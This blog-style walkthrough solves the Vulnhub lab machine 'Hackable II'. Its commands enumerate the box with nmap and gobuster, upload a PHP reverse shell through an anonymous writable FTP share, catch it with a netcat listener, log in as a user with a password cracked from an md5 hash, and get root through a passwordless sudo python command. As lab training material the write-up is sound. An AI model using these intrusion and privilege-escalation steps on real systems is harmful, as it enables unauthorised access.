Hackable II Walkthrough – Vulnhub – Writeup
Hackable II is an easy machine that everyone can root. So, I am doing this walkthrough if you are stuck somehow. Also, I am trying this machine on VirtualBox. “Hackable II Walkthrough – Vulnhub – Writeup”
Link to the machine: https://www.vulnhub.com/entry/hackable-ii,711/
Walkthrough of Cap from Hackthebox
Identify the target
Firstly, I had to get the IP address of the target machine.
sudo netdiscover -i eth0 -r 10.0.2.0/24
My IP address is 10.0.2.15 whereas that of target is 10.0.2.40
Scan open ports
Now that I know the IP address of the target machine, I have to scan open ports so that I would know the exposed services.
nmap -T4 -sC -sV -p- --min-rate=1000 -oN nmap.log 10.0.2.40
As we can see above, we have an FTP server that has allowed anonymous access. Likewise, nmap also displays the filename. So, I am going to look at the file first.
ftp 10.0.2.40
cat CALL.html
It doesn’t say anything right now.
Enumerate web server
Since the FTP server didn’t hinted anything on its own, I did directory enumeration.
gobuster dir -u http://10.0.2.40/ -x txt,php,html --wordlist /usr/share/seclists/Discovery/Web-Content/big.txt -o gobuster.log
Clearly, there is a directory that I could take a look into.
So, it looks like the directory ‘files’ is served on FTP server. Thus, if I could place a webshell in the FTP server, I could execute it using the web browser.
Inject a reverse shell
I would use a web shell from pentestmonkey. Since I am on kali linux, I have this in the directory ‘/usr/share/webshells/php’. Otherwise, you can take a look at the following link.
https://pentestmonkey.net/tools/web-shells/php-reverse-shell
Now, I changed the IP address and port. Then, I listened at the port.
nc -nlvp 4444
Once again, I opened the ftp client and tried to put the shell in there.
ftp 10.0.2.40put shell.php
As we can see, the FTP server had write access. So, I could write on the directory which is being served by the FTP server. As I know the directory, I directly opened the shell from my browser.
Like this, I got the shell. I did a few tweaks to make it smart.
SHELL=/bin/bash script -q /dev/null
export TERM=xterm
# do Ctrl + Z
stty raw -echo;fg
reset
stty cols 143 rows 43Get user’s access
My next step would be getting access to one of the users of the machine. So, I looked up the users first.
There is a user named shrek. Hence, either I need to get the credentials of shrek or get a way to enter his shell without a password.
So, I found a file in the directory /home.
cd /home
ls -al
cat important.txt
So, I looked at the content of the script file.
ls -l /.runme.sh
cat .runme.sh
The author had tried to troll us but I escaped his trolling. However, on the bottom of the file, there is something that interested me.
It is an md5 hash of something. Thus, I went to crackstation to crack it.
The hash was of the word ‘onion. This word was also present on the file CALL.html.
Hence, I gave it a shot as the password of the user shrek and that worked as well.
su shrek
Finally, I got the user’s flag.
Get root shell
We came to the last bit of the challenge now. Basically, in this stage, I first check SUID binaries, sudo permissions and binaries with capabilities.
sudo -l
When I checked the sudo permissions, the user shrek doesn’t require a password to execute commands as root. Now, we can get a shell of the root user using this binary.
Reference: https://gtfobins.github.io/gtfobins/python/#shell
sudo python3.5 -c 'import os; os.system("/bin/bash")'
Lastly, I got the root flag.
cd /root
ls -al
cat root.txt
Conclusion
Like I said during the start of the walkthrough, this is a very easy machine to do the challenge. Hence, I recommend this to very beginners into the CTF challenges. You guys can also recommend this post to someone who wants to start with very basic challenges.